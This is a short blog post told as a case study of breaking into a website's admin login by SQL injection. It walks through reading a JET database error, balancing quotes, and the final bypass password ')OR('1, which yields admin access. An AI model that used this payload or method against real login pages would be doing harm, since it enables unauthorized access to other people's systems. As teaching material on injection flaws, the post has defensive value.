This is a case study, of a Site that was broken into. And Often I will Be Posting Case Studies To show different ways of fuzzing.
Here I sharing the Way the Admin Panel Was broken.
So, I had the Admin Login Page in front of me, the very first thing I can try is, insert a garbage value, to see the response. If we get an error directly from the database, its good, otherwise its again a different story.
The Username I entered as 'admin' and for password, I entered was '
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression '(UID='admin' AND PWD=''');'
Awesome, We got an Error Here, lets try to understand the Error.
The moment I entered ' this broke the normal functionality, Which means insertion of ' made the Query unbalanced somewhere.
'(UID='admin' AND PWD=''');'
Remove the Outer '
(UID='admin' AND PWD=''');
Remove the ;
(UID='admin' AND PWD=''')
lets break it and try to understand.
' ( UID = ' <user_input> ' AND PWD = ' <user_input> ' ) ;'
When user-name: admin and password: '
' ( UID = ' admin ' AND PWD = ' ' ' ) ;'
If password is: ')
' ( UID = ' admin ' AND PWD = ' ' ) ' ) ;'
Left Side is kind of balanced, but we do still have an extra single quote.
If Password is: ')OR('1'
' ( UID = ' admin ' AND PWD = ' ' ) OR ( ' 1 ' ) ;'
Seems Like Balanced, Lets Check It Out.
So I am checking with, username: admin, password: ')OR('1'
Oops Got an error:
Syntax error in string in query expression '(UID='admin' AND PWD='')OR('1'');'.
[Purposely, I made the error, to show you how to understand from errors]
After analysing the error, I do see
PWD=' ')OR('1' '
Unbalanced Quotes, My bad, We need to remove the last single quote from our query,
So again our username: admin, and password: ')OR('1
Woops it said Welcome Admin.
Thus it is just to show that, using some predefined SQL Query, for breaking panels, would be many a times useless, because fuzzing always depends on the way developers developed it.
Thats All For This post.
0 comments:
Post a Comment